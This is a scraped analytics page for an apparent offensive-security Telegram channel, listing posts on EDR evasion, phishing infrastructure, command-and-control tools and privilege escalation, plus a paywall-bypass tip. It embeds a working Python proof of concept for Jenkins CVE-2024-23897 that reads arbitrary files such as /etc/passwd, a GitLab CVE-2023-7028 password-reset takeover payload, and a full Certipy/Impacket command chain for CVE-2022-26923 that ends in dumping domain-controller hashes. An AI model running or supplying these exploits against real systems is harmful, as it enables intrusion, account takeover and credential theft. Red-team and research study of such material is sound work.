Available now! Telegram Research 2025 — the year's key insights 
APT
Open in Telegram
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat
Show more📈 Analytical overview of Telegram channel APT
Channel APT (@apt_notes) in the English language segment is an active participant. Currently, the community unites 14 650 subscribers, ranking 8 841 in the Technologies & Applications category and 45 663 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 650 subscribers.
According to the latest data from 11 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 406 over the last 30 days and by 16 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 48.83%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
- Post reach: On average, each post receives 7 154 views. Within the first day, a publication typically gains 0 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 18.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“This channel discusses:
— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc
Disclaimer:
t.me/APT_Notes/6
Chat Link:
t.me/APT_Notes_PublicChat”
Thanks to the high frequency of updates (latest data received on 12 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
14 650
Subscribers
+1624 hours
+1087 days
+40630 days
Posts Archive
14 653
👍 Whitespots: Application Security Platform
It’s a really powerful security automation platform for those of us who are working on defense side.
🚀 The platform solves such problems as:
— Issues deduplication (within incremental scans + between different scanners using rules);
— Automated verification (using rules);
— Automated resolving (if the issue doesn’t exist in a new report);
— Running of custom tools in a sequence (like Subfinder -> Naabu -> Httpx-> Nuclei);
— Sequences scheduling.
🔗 Source:
https://gitlab.com/whitespots-public/appsec-portal
#devsecops #sast #dast #osa #automation
14 653
⚙️ Introduction to Bypassing Hooks EDR
The article explores methods of bypassing EDR hooks in the user mode of the Windows operating system, starting with an explanation of system calls and their role in transitioning between user and kernel modes. Subsequently, various techniques for bypassing hooks are discussed, including direct and indirect syscalls, along with their advantages and potential limitations when used for evading protective mechanisms.
🔗 https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
#maldev #edr #hooks #syscalls
14 653
🖼️ Bypass Medium Paywall
A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:
🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercal.app/
#medium #premium #bypass
14 653
Repost from Ralf Hacker Channel
Набор инструментов для удалённого дампа паролей.
https://github.com/Slowerzs/ThievingFox/
Ну и сам блог:
https://blog.slowerzs.net/posts/thievingfox/
#pentest #redteam #creds
14 653
⛓ Trusted Domain, Hidden Danger
In this blog post describes a prevalent tactic used in phishing attacks, which involves exploiting legitimate platforms for redirection through deceptive links.
Source:
🔗 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trusted-domain-hidden-danger-deceptive-url-redirections-in-email-phishing-attacks/
#phishing #url #redirect
14 653
🖼️ Protect Evilginx using Cloudflare
Using a combination of Cloudflare and HTML Obfuscation, it is possible to protect your Evilginx server from being flagged as deceptive and so increase your chances of success on Red Team and Social Engineering engagements.
Source:
🔗 https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
#phishing #cloudflare #evilginx #html
14 653
🖼️ BOFHound
This is an offline BloodHound ingestor and LDAP result parser. BOFHound allows operators to utilize BloodHound's beloved interface while maintaining full control over the LDAP queries being run and the spped at which they are executed. This leaves room for operator discretion to account for potential honeypot accounts, expensive LDAP query thresholds and other detection mechanisms designed with the traditional, automated BloodHound collectors in mind.
Tools:
🔗 https://github.com/coffeegist/bofhound
Research:
🔗 https://posts.specterops.io/bofhound-session-integration-7b88b6f18423
#c2 #bof #cobaltstrike #redteam
14 653
👩💻 Azure Outlook Command & Control
Remotely control a compromised Windows Device from your Outlook mailbox. Threat Emulation Tool for North Korean APT InkySquid/ScarCruft/APT37.
🔗 https://github.com/boku7/azureOutlookC2
#c2 #azure #outlook #graphapi #redteam
14 653
🐶 SOAPHound
This is a custom-developed .NET data collector tool which can be used to enumerate Active Directory environments via the Active Directory Web Services (ADWS) protocol.
Tool:
🔗 https://github.com/FalconForceTeam/SOAPHound
Research:
🔗 https://falconforce.nl/soaphound-tool-to-collect-active-directory-data-via-adws/
#ad #windows #bloodhound #soap #adws
14 653
👩💻 Windows CLFS Driver Privilege Escalation
This vulnerability targets the Common Log File System (CLFS) and allows attackers to escalate privileges and potentially fully compromise an organization’s Windows systems. In April 2023, Microsoft released a patch for this vulnerability and the CNA CVE-2023-28252 was assigned.
📊 Affects version:
— Windows 11 21H2 (clfs.sys version 10.0.22000.1574);
— Windows 11 22H2;
— Windows 10 21H2;
— Windows 10 22H2;
— Windows Server 2022.
Research:
🔗 https://www.coresecurity.com/core-labs/articles/analysis-cve-2023-28252-clfs-vulnerability
Exploit:
🔗 https://github.com/duck-sec/CVE-2023-28252-Compiled-exe
#windows #privesc #clfs #driver
14 653
😴 Creating Object File Monstrosities with Sleep Mask and LLVM
The Mutator kit is now part of the Cobalt Strike Arsenal Kit. It allows you to mutate BOFs, sleep masks and more with LLVM.
Read about it on the blog:
🔗 https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm
#c2 #sleepmask #llvm #redteam
14 653
Repost from Похек
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()python poc.py http://127.0.0.1:8888/ [/etc/passwd]14 653
👩💻 Writing your own RDI /sRDI loader using C and ASM
Learn the process of crafting a personalized RDI/sRDI loader in C and ASM, incorporating code optimization to achieve full position independence.
🔗 https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/
#maldev #reflective #dll #clang #asm
14 653
Repost from Offensive Xwitter
😈 [ Octoberfest7 @Octoberfest73 ]
I'm exited to release GraphStrike, a project I completed during my internship at @RedSiege. Route all of your Cobalt Strike HTTPS traffic through graph.microsoft.com.
Tool:
🔗 https://github.com/RedSiege/GraphStrike?tab=readme-ov-file
Dev blog:
🔗 https://redsiege.com/blog/2024/01/graphstrike-developer
🐥 [ tweet ]
14 653
Repost from Управление Уязвимостями и прочее
Курьёзная критичная уязвимость в GitLab - восстановление пароля от аккаунта на левый email (CVE-2023-7028). 🤦♂️🙂 Уязвимы версии GitLab CE/EE с 16.1.0. CVSS 10. Патчи доступны.
Как это произошло?
В версии 16.1.0 было внесено изменение, позволяющее пользователям сбрасывать свой пароль используя дополнительный адрес электронной почты. Уязвимость является результатом ошибки в процессе верификации электронной почты.
В микроблогах пишут, что PoC буквально такой:
user[email][]=valid@email.com&user[email][]=attacker@email.comПользователи, у которых включена двухфакторная аутентификация, уязвимы для сброса пароля, но не для захвата учетной записи, поскольку для входа в систему требуется второй фактор аутентификации. Двухфакторка рулит. GitLab - решето. 🙂 @avleonovrus #GitLab
14 653
Repost from Purple Chronicles
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
# Установка
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfxGet-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.localcertipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machinecertipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt14 653
Repost from PT SWARM
New article by our researcher @snovvcrash: "Python ❤️ SSPI: Teaching #Impacket to Respect Windows SSO".
🥷 Read the blog post and you'll fly under the radar of endpoint security mechanisms as well as custom network detection rules more easily.
https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/
14 653
Repost from 1N73LL1G3NC3
Stinger
CIA UAC bypass implementation of Stinger that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as Administrator
14 653
🎄Happy New Year!
Happy holiday to you, dear friends and subscribers of my channel!
Love you all ♥️
